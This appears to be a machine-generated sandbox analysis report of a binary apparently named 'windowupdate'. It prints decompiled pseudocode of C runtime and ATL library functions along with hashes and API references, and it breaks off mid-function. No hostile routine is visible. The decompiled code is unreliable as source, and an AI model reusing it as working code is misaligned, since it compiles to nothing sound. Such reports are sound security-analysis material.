                      C-Code - Quality: 100%
                      			E00D54EA0(intOrPtr _a4) {
                      				signed int _v8;
                      				signed int _v12;
                      				signed int _v16;
                      				char _v24;
                      				signed int _v28;
                      				char _v32;
                      				char* _v36;
                      				char _v40;
                      				char* _v44;
                      				char _v48;
                      				intOrPtr _v52;
                      				char _v56;
                      				intOrPtr _v60;
                      				char _v64;
                      				char _v72;
                      				char* _t48;
                      				char* _t79;
                      				signed int _t80;
                      
                      				E00D4F3F0( &_v24);
                      				_t48 =  *0xf20640; // 0x0
                      				if( *_t48 == 0) {
                      					E00D4F350(_a4, 1);
                      					return _a4;
                      				}
                      				_t79 =  *0xf20640; // 0x0
                      				_v8 =  *_t79;
                      				_v8 = _v8 - 0x30;
                      				if(_v8 > 7) {
                      					E00D4F350(_a4, 2);
                      					return _a4;
                      				}
                      				_t80 = _v8;
                      				switch( *((intOrPtr*)(_t80 * 4 +  &M00D55018))) {
                      					case 0:
                      						_v32 = E00D50060("char ", 5);
                      						_v28 = _t80;
                      						E00D4F7E0( &_v24,  &_v32);
                      						goto L9;
                      					case 1:
                      						_v40 = E00D50060("short ", 6);
                      						_v36 = __edx;
                      						__ecx =  &_v40;
                      						__ecx =  &_v24;
                      						__eax = E00D4F7E0(__ecx,  &_v40);
                      						goto L9;
                      					case 2:
                      						goto L9;
                      					case 3:
                      						_v48 = E00D50060("int ", 4);
                      						_v44 = __edx;
                      						__edx =  &_v48;
                      						__ecx =  &_v24;
                      						__eax = E00D4F7E0(__ecx,  &_v48);
                      						goto L9;
                      					case 4:
                      						_v56 = E00D50060("long ", 5);
                      						_v52 = __edx;
                      						__eax =  &_v56;
                      						__ecx =  &_v24;
                      						__eax = E00D4F7E0(__ecx,  &_v56);
                      						L9:
                      						_t73 =  *0xf20640; // 0x0
                      						_v16 =  *_t73;
                      						_t57 =  *0xf20640; // 0x0
                      						 *0xf20640 = _t57 + 1;
                      						_v12 = _v16;
                      						_t83 = _v12 - 0x31;
                      						_v12 = _t83;
                      						if(_v12 > 6) {
                      							goto L12;
                      						}
                      						switch( *((intOrPtr*)(_v12 * 4 +  &M00D55038))) {
                      							case 0:
                      								goto L11;
                      							case 1:
                      								goto L12;
                      						}
                      					case 5:
                      						L11:
                      						_v64 = E00D50060("unsigned ", 9);
                      						_v60 = _t83;
                      						E00D4F820( &_v24, E00D4FAA0( &_v72,  &_v64,  &_v24));
                      						goto L12;
                      					case 6:
                      						L12:
                      						E00D4F240(_a4,  &_v24);
                      						return _a4;
                      				}
                      			}

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: MailboxNameName::$Iterator_baseIterator_base::_operator+std::_
                      • String ID: char $int $long $short $unsigned
                      • API String ID: 3503010255-3894466517
                      • Opcode ID: 60438ecb2735a1d6e12a457c4cb42bacd681ae9c246101d5bc825d6460cec555
                      • Instruction ID: 6b0a7ec050e3e6c158be85cb3a547dabaf072c58f23760da04597fd12904fcef
                      • Opcode Fuzzy Hash: 60438ecb2735a1d6e12a457c4cb42bacd681ae9c246101d5bc825d6460cec555
                      • Instruction Fuzzy Hash: 6F4121B1D40208EFCB15DF98DC92AEEBBB4FF44305F14416AE90677291EA305A48CB71
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 98%
                      			E00D9D2C0(void* __ebx, void* __ecx, void* __edi, void* __esi, signed int* _a4, void* _a8) {
                      				char _v6;
                      				char _v7;
                      				char _v8;
                      				signed int* _v12;
                      				char _v16;
                      				signed int _v20;
                      				char _v24;
                      				signed int _v28;
                      				intOrPtr _v32;
                      				intOrPtr* _v36;
                      				char _v40;
                      				intOrPtr _v44;
                      				signed int _v48;
                      				signed int _v52;
                      				signed int _v56;
                      				signed int _v60;
                      				char _v64;
                      				char _v68;
                      				signed int _v72;
                      				signed int _v76;
                      				intOrPtr _v80;
                      				intOrPtr* _v84;
                      				char _v88;
                      				intOrPtr _v92;
                      				char _v104;
                      				void* _t107;
                      				void* _t109;
                      				signed char _t111;
                      				void* _t116;
                      				void* _t134;
                      				signed int _t136;
                      				signed int _t139;
                      				signed int _t143;
                      				void* _t149;
                      				void* _t150;
                      				void* _t151;
                      				signed int _t180;
                      				signed int _t195;
                      				signed int _t198;
                      				void* _t202;
                      				void* _t203;
                      				void* _t204;
                      				void* _t205;
                      				void* _t208;
                      
                      				_t203 = __esi;
                      				_t202 = __edi;
                      				_t151 = __ecx;
                      				_t150 = __ebx;
                      				if(_a8 == 0) {
                      					_v40 = 0;
                      				} else {
                      					_v40 = 1;
                      				}
                      				_v44 = _v40;
                      				_t211 = _v44;
                      				if(_v44 == 0) {
                      					_t149 = L00D84930(_t211, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\startup\\argv_wildcards.cpp", 0x138, 0, L"%ls", L"result != nullptr");
                      					_t204 = _t204 + 0x18;
                      					if(_t149 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				if(_v44 != 0) {
                      					 *_a8 = 0;
                      					E00D9E400( &_v104);
                      					_v12 = _a4;
                      					while(1) {
                      						__eflags =  *_v12;
                      						if( *_v12 == 0) {
                      							break;
                      						}
                      						_v8 = 0x2a;
                      						_v7 = 0x3f;
                      						_v6 = 0;
                      						_t136 = E00D9E300(_v12,  &_v8);
                      						_t208 = _t204 + 8;
                      						_v52 = _t136;
                      						__eflags = _v52;
                      						if(_v52 != 0) {
                      							_t139 = E00D9DAE0(_t150, _t202, _t203,  *_v12, _v52,  &_v104);
                      							_t204 = _t208 + 0xc;
                      							_v56 = _t139;
                      							__eflags = _v56;
                      							if(_v56 == 0) {
                      								L17:
                      								_t180 =  &(_v12[1]);
                      								__eflags = _t180;
                      								_v12 = _t180;
                      								continue;
                      							}
                      							_v76 = _v56;
                      							E00D9E500( &_v104);
                      							return _v76;
                      						}
                      						_t143 = E00D9D8A0( *_v12, _t202,  *_v12, 0, 0,  &_v104);
                      						_t204 = _t208 + 0x10;
                      						_v48 = _t143;
                      						__eflags = _v48;
                      						if(_v48 == 0) {
                      							goto L17;
                      						}
                      						_v72 = _v48;
                      						E00D9E500( &_v104);
                      						return _v72;
                      					}
                      					_v60 = E00D9EFB0( &_v104) + 1;
                      					_v32 = 0;
                      					_v28 = E00D9E980( &_v104);
                      					while(1) {
                      						_t107 = E00D9EAF0( &_v104);
                      						__eflags = _v28 - _t107;
                      						if(_v28 == _t107) {
                      							break;
                      						}
                      						_t134 = E00D8BFB6(_v28);
                      						_t204 = _t204 + 4;
                      						_t51 = _t134 + 1; // 0x1
                      						_v32 = _v32 + _t51;
                      						_t198 = _v28 + 4;
                      						__eflags = _t198;
                      						_v28 = _t198;
                      					}
                      					_t109 = E00D8B890(_t202, _v60, _v32, 1);
                      					_t205 = _t204 + 0xc;
                      					E00D8B460( &_v16, _t109);
                      					_t111 = E00D8B520( &_v16);
                      					__eflags = _t111 & 0x000000ff;
                      					if((_t111 & 0x000000ff) != 0) {
                      						_v84 = E00D8B6D0( &_v16);
                      						_v64 = E00D8B6D0( &_v16) + _v60 * 4;
                      						_v36 = _v84;
                      						_v24 = _v64;
                      						_v20 = E00D9E980( &_v104);
                      						while(1) {
                      							_t116 = E00D9EAF0( &_v104);
                      							__eflags = _v20 - _t116;
                      							if(_v20 == _t116) {
                      								break;
                      							}
                      							_v68 = E00D8BFB6(_v20) + 1;
                      							_v88 = _v32 - _v24 - _v64;
                      							E00D84A20(E00D9E1E0( &_v24,  &_v88, _v20,  &_v68), _t126, L"traits::tcsncpy_s( character_it, character_count - (character_it - character_first), *it, count)", L"common_expand_argv_wildcards", L"minkernel\\crts\\ucrt\\src\\appcrt\\startup\\argv_wildcards.cpp", 0x175, 0);
                      							_t205 = _t205 + 0x2c;
                      							 *_v36 = _v24;
                      							_v36 = _v36 + 4;
                      							_v24 = _v24 + _v68;
                      							_t195 = _v20 + 4;
                      							__eflags = _t195;
                      							_v20 = _t195;
                      						}
                      						 *_a8 = E00D8B5E0( &_v16);
                      						_v92 = 0;
                      						E00D8B4C0( &_v16);
                      						E00D9E500( &_v104);
                      						return _v92;
                      					}
                      					_v80 = 0xffffffff;
                      					E00D8B4C0( &_v16);
                      					E00D9E500( &_v104);
                      					return _v80;
                      				} else {
                      					 *((intOrPtr*)(L00D82F70(_t151))) = 0x16;
                      					E00D82900(L"result != nullptr", L"common_expand_argv_wildcards", L"minkernel\\crts\\ucrt\\src\\appcrt\\startup\\argv_wildcards.cpp", 0x138, 0);
                      					return 0x16;
                      				}
                      			}

                      APIs
                      • std::exception::exception.LIBCMTD ref: 00D9D355
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 00D9D473
                        • Part of subcall function 00D9E1E0: __wcstombs_l.LIBCMTD ref: 00D9E1FD
                      • __invoke_watson_if_error.LIBCMTD ref: 00D9D540
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: TimevecTimevec::___invoke_watson_if_error__wcstombs_lstd::_std::exception::exception
                      • String ID: %ls$*$?$common_expand_argv_wildcards$minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp$result != nullptr$traits::tcsncpy_s( character_it, character_count - (character_it - character_first), *it, count)
                      • API String ID: 3210742261-976376051
                      • Opcode ID: a9512855db5435fc986e5344f0fbee84f705c3bff43540656bd9a3cb2322f63e
                      • Instruction ID: 4808999d8376234ccedbd00b1515ba3213d99c8b85b597a53a94359dfb7c1b43
                      • Opcode Fuzzy Hash: a9512855db5435fc986e5344f0fbee84f705c3bff43540656bd9a3cb2322f63e
                      • Instruction Fuzzy Hash: 94912870D00209EFDF04EF94C886AEEB7B5EF54304F24452AE5067B291EB70AA45CBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 96%
                      			E00D31CF0(void* __ebx, char* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20) {
                      				signed int _v8;
                      				char _v2060;
                      				signed int _v2068;
                      				signed int _v2072;
                      				char* _v2076;
                      				char _v2084;
                      				char _v2612;
                      				char _v2616;
                      				signed int _t46;
                      				signed int _t47;
                      				void* _t49;
                      				signed int _t54;
                      				void* _t56;
                      				void* _t63;
                      				void* _t66;
                      				void* _t70;
                      				signed int _t76;
                      				char* _t95;
                      				void* _t97;
                      				void* _t102;
                      				void* _t103;
                      				void* _t104;
                      				signed int _t105;
                      				void* _t106;
                      				void* _t107;
                      				void* _t110;
                      
                      				_t104 = __esi;
                      				_t95 = __edx;
                      				_t70 = __ebx;
                      				_t102 =  &_v2616;
                      				memset(_t102, 0xcccccccc, 0x28d << 2);
                      				_t107 = _t106 + 0xc;
                      				_t103 = _t102 + 0x28d;
                      				_t46 =  *0xdf600c; // 0x71e60372
                      				_t47 = _t46 ^ _t105;
                      				_v8 = _t47;
                      				if( *0xf2368c == 0xffffffff) {
                      					L3:
                      					L17:
                      					E00DC14C0(_t105, 0xd31f28);
                      					_t49 = _t47;
                      					_t97 = _t95;
                      					return E00DC1520(E00D47280(_t49, _t70, _v8 ^ _t105, _t97, _t103, _t104), _t105 - _t107 + 0xa34);
                      				}
                      				_t47 =  *0xf2368c;
                      				if(_t47 < _a16) {
                      					goto L3;
                      				}
                      				_t76 =  *0xf1f2f8; // 0xffffffff
                      				_t77 = _t76 & _a12;
                      				if((_t76 & _a12) != 0) {
                      					_t95 =  &_v2060;
                      					E00D4AF80(_t103, _t95, 0, 0x800);
                      					_v2068 = 0;
                      					_t54 = E00D31CA0(_t77, _a12);
                      					_t110 = _t107 + 0x10;
                      					_v2072 = _t54;
                      					__eflags = _v2072;
                      					if(__eflags == 0) {
                      						_t47 = E00D31490(__eflags,  &_v2060, 0x400, L"%u - ", _a12);
                      						_t107 = _t110 + 0x10;
                      						_v2068 = _t47;
                      						__eflags = _v2068 - 0xffffffff;
                      						if(_v2068 != 0xffffffff) {
                      							L10:
                      							_t56 = E00D85A70(_a20);
                      							_t107 = _t107 + 4;
                      							_t22 = _v2068 + 1; // 0x1
                      							_t95 = _t56 + _t22;
                      							_v2076 = _t95;
                      							E00D3F150( &_v2084);
                      							__eflags = E00D3F0C0( &_v2084, _t95, __eflags, _v2076) & 0x000000ff;
                      							if(__eflags != 0) {
                      								 *((short*)(E00D3F180( &_v2084))) = 0;
                      								_push(_a20);
                      								_t95 = _v2076;
                      								_t63 = E00D31490(__eflags, E00D3F180( &_v2084), _t95, L"%ls%ls",  &_v2060);
                      								_t107 = _t107 + 0x14;
                      								__eflags = _t63 - 0xffffffff;
                      								if(__eflags != 0) {
                      									E00D4AF80(_t103,  &_v2612, 0, 0x208);
                      									_t95 =  &_v2612;
                      									_t66 = E00D31490(__eflags, _t95, 0x104, L"%hs", _a4);
                      									_t107 = _t107 + 0x1c;
                      									__eflags = _t66 - 0xffffffff;
                      									if(__eflags != 0) {
                      										L00D84930(__eflags, 0,  &_v2612, _a8, 0, "%ls", E00D3F180( &_v2084));
                      										_t107 = _t107 + 0x18;
                      										_t47 = E00D322D0( &_v2084, __eflags);
                      									} else {
                      										_t47 = E00D322D0( &_v2084, __eflags);
                      									}
                      								} else {
                      									_t47 = E00D322D0( &_v2084, __eflags);
                      								}
                      							} else {
                      								_t47 = E00D322D0( &_v2084, __eflags);
                      							}
                      							goto L17;
                      						}
                      						goto L17;
                      					}
                      					_t95 =  &_v2060;
                      					_t47 = E00D31490(__eflags, _t95, 0x400, L"%ls - ", _v2072);
                      					_t107 = _t110 + 0x10;
                      					_v2068 = _t47;
                      					__eflags = _v2068 - 0xffffffff;
                      					if(_v2068 != 0xffffffff) {
                      						goto L10;
                      					} else {
                      						goto L17;
                      					}
                      				}
                      				goto L3;
                      			}

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Module$CheckStackVars@8
                      • String ID: %hs$%ls$%ls - $%ls%ls$%u -
                      • API String ID: 3912913270-3378233065
                      • Opcode ID: c89e31a6203e3ed4f93f8865c1ed96357cc6b6c606b1fc1b4769cf8a5b869f42
                      • Instruction ID: 5695af2de730c49f3be5934dfaeca16be278000777229b6878fe02e4de23ea8b
                      • Opcode Fuzzy Hash: c89e31a6203e3ed4f93f8865c1ed96357cc6b6c606b1fc1b4769cf8a5b869f42
                      • Instruction Fuzzy Hash: A351A27A9002199BCB14FB14DC52BEA7378FF04314F0086A8F55557192EE716A85CFF1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00D57390(intOrPtr _a4) {
                      				signed int _v8;
                      				signed int _v12;
                      				signed int _v16;
                      				signed int _v20;
                      				char _v28;
                      				intOrPtr _v32;
                      				char _v36;
                      				signed int _v40;
                      				char _v44;
                      				signed int _v48;
                      				char _v52;
                      				signed int _v56;
                      				char _v60;
                      				char* _t46;
                      				intOrPtr _t50;
                      				char* _t51;
                      				char _t60;
                      				char _t64;
                      				signed int _t68;
                      				char _t69;
                      				char _t71;
                      				intOrPtr _t77;
                      				char* _t94;
                      				intOrPtr _t96;
                      				intOrPtr _t98;
                      				intOrPtr _t99;
                      				signed int _t104;
                      				void* _t105;
                      				void* _t106;
                      
                      				_t46 =  *0xf20640; // 0x0
                      				if( *_t46 == 0) {
                      					L20:
                      					E00D4F3F0(_a4);
                      					return _a4;
                      				}
                      				_t94 =  *0xf20640; // 0x0
                      				if( *_t94 != 0x5f) {
                      					goto L20;
                      				}
                      				_t77 =  *0xf20640; // 0x0
                      				if( *((char*)(_t77 + 1)) == 0) {
                      					goto L20;
                      				}
                      				_t50 =  *0xf20640; // 0x0
                      				if( *((char*)(_t50 + 1)) > 0x44) {
                      					goto L20;
                      				}
                      				_t96 =  *0xf20640; // 0x0
                      				 *0xf20640 = _t96 + 1;
                      				_t51 =  *0xf20640; // 0x0
                      				_v20 =  *_t51 - 0x41;
                      				_t98 =  *0xf20640; // 0x0
                      				_t99 = _t98 + 1;
                      				 *0xf20640 = _t99;
                      				_v8 = _v20;
                      				if(_v8 > 3) {
                      					E00D4F350(_a4, 2);
                      					return _a4;
                      				}
                      				E00D4F3F0( &_v28);
                      				if(E00D52230( &_v28) == 0) {
                      					L18:
                      					E00D4F240(_a4,  &_v28);
                      					return _a4;
                      				}
                      				E00D4FDE0( &_v28, 0x20);
                      				_t60 = E00D50130( &_v28, 0xf);
                      				_t106 = _t105 + 4;
                      				_v36 = _t60;
                      				_v32 = _t99;
                      				E00D4FCA0( &_v28,  &_v36);
                      				while(_v8 != 0) {
                      					_t104 =  !_v8 + 0x00000001 & _v8;
                      					_v16 = _t104;
                      					_v12 = _v16;
                      					if(_v12 == 1) {
                      						_t64 = E00D50060("cpu", 3);
                      						_t106 = _t106 + 8;
                      						_v44 = _t64;
                      						_v40 = _t104;
                      						E00D4FCA0( &_v28,  &_v44);
                      						L14:
                      						_t68 =  !_v16 & _v8;
                      						_v8 = _t68;
                      						if(_t68 != 0) {
                      							_t69 = E00D50060(", ", 2);
                      							_t106 = _t106 + 8;
                      							_v60 = _t69;
                      							_v56 = _t104;
                      							E00D4FCA0( &_v28,  &_v60);
                      						}
                      						continue;
                      					}
                      					if(_v12 == 2) {
                      						_t71 = E00D50060("amp", 3);
                      						_t106 = _t106 + 8;
                      						_v52 = _t71;
                      						_v48 = _t104;
                      						_t104 =  &_v52;
                      						E00D4FCA0( &_v28, _t104);
                      						goto L14;
                      					}
                      					E00D4F350(_a4, 2);
                      					return _a4;
                      				}
                      				E00D4FDE0( &_v28, 0x29);
                      				goto L18;
                      			}

                      APIs
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00D5741B
                      • UnDecorator::doMSKeywords.LIBCMTD ref: 00D57420
                      • DName::operator+=.LIBCMTD ref: 00D57432
                        • Part of subcall function 00D4FDE0: DName::isValid.LIBCMTD ref: 00D4FDEC
                        • Part of subcall function 00D4FDE0: DName::isEmpty.LIBCMTD ref: 00D4FE00
                        • Part of subcall function 00D50130: UnDecorator::doUnderScore.LIBCMTD ref: 00D50136
                        • Part of subcall function 00D4FCA0: DName::isValid.LIBCMTD ref: 00D4FCAC
                        • Part of subcall function 00D4FCA0: DName::isEmpty.LIBCMTD ref: 00D4FCC1
                      • DName::DName.LIBVCRUNTIMED ref: 00D574CA
                        • Part of subcall function 00D4FCA0: DName::append.LIBCMTD ref: 00D4FD24
                      • DName::operator+=.LIBCMTD ref: 00D5750C
                      • Mailbox.LIBCMTD ref: 00D57518
                      • DName::DName.LIBVCRUNTIMED ref: 00D57529
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00D57538
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Name::is$Decorator::doEmptyIterator_baseIterator_base::_NameName::Name::operator+=Validstd::_$KeywordsMailboxName::appendScoreUnder
                      • String ID: amp$cpu
                      • API String ID: 4042095736-2542064945
                      • Opcode ID: 9da89e5ce3c21d2740d484780f0f924473764b626bcade640cdb8428cd22eac5
                      • Instruction ID: 515f4f6050d090d60d3f95d108e00f0635f9da9f5f57514dabcc94649025483b
                      • Opcode Fuzzy Hash: 9da89e5ce3c21d2740d484780f0f924473764b626bcade640cdb8428cd22eac5
                      • Instruction Fuzzy Hash: E9512471D04118DBCF15DFA4E896AEDBBB1FF44342F248069ED056B252EB30AA49DB70
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 95%
                      			E00D37C00(void* __ebx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                      				intOrPtr _v8;
                      				signed int _v12;
                      				char _v20;
                      				char _v32;
                      				char _v40;
                      				char _v44;
                      				char _v48;
                      				void* _t43;
                      				intOrPtr _t44;
                      				void* _t46;
                      				void* _t49;
                      				void* _t59;
                      				void* _t73;
                      				signed int _t100;
                      				void* _t105;
                      				void* _t106;
                      				void* _t107;
                      				void* _t108;
                      				void* _t109;
                      				void* _t110;
                      
                      				_t107 = __esi;
                      				_t100 = __edx;
                      				_t73 = __ebx;
                      				_t105 =  &_v48;
                      				memset(_t105, 0xcccccccc, 0xb << 2);
                      				_t110 = _t109 + 0xc;
                      				_t106 = _t105 + 0xb;
                      				if(_a8 == 0) {
                      					L2:
                      					_t43 = L00D84930(_t114, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0xe3, 0, "%ls", L"lpszKey != 0 && lpszItem != 0");
                      					_t110 = _t110 + 0x18;
                      					if(_t43 == 1) {
                      						asm("int3");
                      					}
                      					L4:
                      					if(_a8 == 0 || _a12 == 0) {
                      						_t44 = 0x80070057;
                      					} else {
                      						_v8 = 0x8007000e;
                      						E00D32AF0(_a4 + 0x10);
                      						_t49 = E00D82E00(_a8);
                      						_t110 = _t110 + 4;
                      						_v12 = _t49 + 1;
                      						E00D3EC30( &_v20);
                      						_t100 = _v12;
                      						__eflags = E00D3EB10(_t73,  &_v20, _t106, _t107, _t100) & 0x000000ff;
                      						if(__eflags != 0) {
                      							E00D326F0(_t73, _t106, _t107, __eflags, E00D3EBF0( &_v20), _v12, _a8);
                      							_t59 = E00D82E00(_a12);
                      							_t110 = _t110 + 0x10;
                      							_v12 = _t59 + 1;
                      							E00D3EC30( &_v32);
                      							_t100 = E00D3EB10(_t73,  &_v32, _t106, _t107, _v12) & 0x000000ff;
                      							__eflags = _t100;
                      							if(__eflags != 0) {
                      								E00D326F0(_t73, _t106, _t107, __eflags, E00D3EBF0( &_v32), _v12, _a12);
                      								_t110 = _t110 + 0xc;
                      								_v40 = E00D3EBF0( &_v32);
                      								_v44 = E00D3EBF0( &_v20);
                      								_t100 =  &_v40;
                      								__eflags = E00D3E340(_a4 + 4,  &_v44, _t100);
                      								if(__eflags != 0) {
                      									_v8 = 0;
                      									E00D3EAE0( &_v20);
                      									E00D3EAE0( &_v32);
                      								}
                      							}
                      							E00D3EC00( &_v32, __eflags);
                      						}
                      						__eflags = _a4 + 0x10;
                      						E00D32B00(_a4 + 0x10);
                      						_v48 = _v8;
                      						E00D3EC00( &_v20, __eflags);
                      						_t44 = _v48;
                      					}
                      					_push(_t100);
                      					E00DC14C0(_t108, 0xd37d8c);
                      					_t46 = _t44;
                      					return E00DC1520(_t46, _t108 - _t110 + 0x2c);
                      				}
                      				_t114 = _a12;
                      				if(_a12 != 0) {
                      					goto L4;
                      				}
                      				goto L2;
                      			}

                      APIs
                      Strings
                      • %ls, xrefs: 00D37C27
                      • lpszKey != 0 && lpszItem != 0, xrefs: 00D37C22
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlplus.h, xrefs: 00D37C33
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Module__crt_unique_heap_ptr_strlen$CheckStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlplus.h$lpszKey != 0 && lpszItem != 0
                      • API String ID: 4051287597-3321575645
                      • Opcode ID: 9b5b684938d82ebdf8502f2c2be77d30fe4f16a483f2ace503474d4d8c5c704b
                      • Instruction ID: a586002ee168b3f920dd9007b403ee609a4491f3dee209fd4676490fbe2e2cd5
                      • Opcode Fuzzy Hash: 9b5b684938d82ebdf8502f2c2be77d30fe4f16a483f2ace503474d4d8c5c704b
                      • Instruction Fuzzy Hash: F5412EB6D00209ABCB15EF94D852BEEB374FF54300F148529E5166B2C2EA359A44CBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 46%
                      			E00DC15E0(void* __ecx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                      				signed int _v8;
                      				char _v28;
                      				char _v80;
                      				char _v324;
                      				intOrPtr _v328;
                      				void* __ebx;
                      				void* __edi;
                      				signed int _t18;
                      				signed int _t30;
                      				intOrPtr _t36;
                      				void* _t42;
                      				intOrPtr _t43;
                      				void* _t45;
                      				signed int _t46;
                      
                      				_t44 = __esi;
                      				_t37 = __ecx;
                      				_t18 =  *0xdf600c; // 0x71e60372
                      				_v8 = _t18 ^ _t46;
                      				_t20 = _a4;
                      				_t36 = _a8;
                      				_t43 =  *0xf1f3e8; // 0x1
                      				_v328 = _a4;
                      				if(_t43 == 0xffffffff) {
                      					L4:
                      					__eflags = _v8 ^ _t46;
                      					return E00D47280(_t20, _t36, _v8 ^ _t46, _t42, _t43, _t44);
                      				} else {
                      					if(_t36 != 0) {
                      						_push(__esi);
                      						_t7 = _t36 + 0x20; // 0x21
                      						_t45 = _t7;
                      						E00DC17D0(__ecx,  &_v28,  &_v80, _t45,  *((intOrPtr*)(_t36 + 0xc)) - 0x24);
                      						_push("\n");
                      						_push( &_v80);
                      						_push("> ");
                      						_push( &_v28);
